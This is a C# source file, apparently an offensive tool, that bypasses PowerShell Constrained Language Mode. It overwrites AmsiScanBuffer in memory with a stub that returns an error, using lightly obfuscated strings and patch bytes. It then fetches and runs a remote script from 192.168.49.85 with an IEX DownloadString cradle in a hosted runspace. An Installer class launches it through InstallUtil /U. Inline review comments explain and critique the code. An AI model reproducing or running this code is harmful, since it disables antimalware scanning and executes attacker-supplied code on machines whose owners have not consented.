// CLM bypass via an in-process AMSI patch, loaded through an InstallUtil /U run
// (the Installer subclass at the bottom). The only "obfuscation" present is
// base64-encoded strings and patch bytes stored +1; both are trivially
// reversible, so "undetected" should not be assumed against signature-based or
// memory-integrity checks on amsi!AmsiScanBuffer.
using System;
using System.Management.Automation;
using System.Text;
using System.Runtime.InteropServices;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;

namespace Bypass
{
    class Program
    {
        // kernel32 P/Invokes used to locate and overwrite AmsiScanBuffer.
        [DllImport("kernel32")]
        static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

        [DllImport("kernel32")]
        static extern IntPtr LoadLibrary(string name);

        [DllImport("kernel32")]
        static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        static void Main(string[] args)
        {
            foo();
        }

        // Patches amsi!AmsiScanBuffer in the current process, then runs a
        // remotely fetched PowerShell script through a hosted runspace.
        // NOTE(review): LoadLibrary/GetProcAddress are never checked for
        // IntPtr.Zero and both VirtualProtect results are discarded; if amsi.dll
        // cannot be loaded or the export is missing, Marshal.Copy writes to an
        // invalid address and the process faults.
        public static void foo()
        {
            // "YW1zaS5kbGw=" decodes to "amsi.dll".
            byte[] data = Convert.FromBase64String("YW1zaS5kbGw=");
            string am = Encoding.UTF8.GetString(data);
            var lib = LoadLibrary(am);
            // "QW1zaVNjYW5CdWZmZXI=" decodes to "AmsiScanBuffer".
            data = Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=");
            am = Encoding.UTF8.GetString(data);
            var asb = GetProcAddress(lib, am);
            // Each byte is stored +1; after the loop the patch is
            // B8 57 00 07 80 C3 = mov eax, 0x80070057 ; ret
            // so AmsiScanBuffer returns E_INVALIDARG immediately without
            // producing a scan verdict.
            var patch = new byte[] { 0xB9, 0x58, 0x01, 0x08, 0x81, 0xC4 };
            for (int i = 0; i < patch.Length; i++)
            {
                patch[i] = (byte)(((uint)patch[i] - 1));
            }
            // 0x40 = PAGE_EXECUTE_READWRITE. Order matters: make the page
            // writable, copy the stub, then restore the saved protection.
            _ = VirtualProtect(asb, (UIntPtr)patch.Length, 0x40, out uint oldProtect);
            Marshal.Copy(patch, 0, asb, patch.Length);
            _ = VirtualProtect(asb, (UIntPtr)patch.Length, oldProtect, out uint _);
            // Hard-coded plaintext-HTTP stager on a private-range address; the
            // downloaded script is executed verbatim with no integrity check.
            String cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.85/foos.ps1')";
            // Hosted runspace: the script runs inside this process rather than a
            // separate powershell.exe, which is presumably how the CLM
            // restriction is sidestepped — verify against the target's policy.
            // NOTE(review): neither the Runspace nor the PowerShell instance is
            // disposed, and rs.Close() is skipped if Invoke() throws.
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();
        }
    }

    // Installer hook: "InstallUtil.exe /U <assembly>" invokes Uninstall, which
    // runs the payload via a signed Microsoft binary instead of executing the
    // assembly directly. Install() is not overridden, so the install path does
    // nothing beyond the base implementation.
    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            base.Uninstall(savedState);
            Program.foo();
        }
    }
}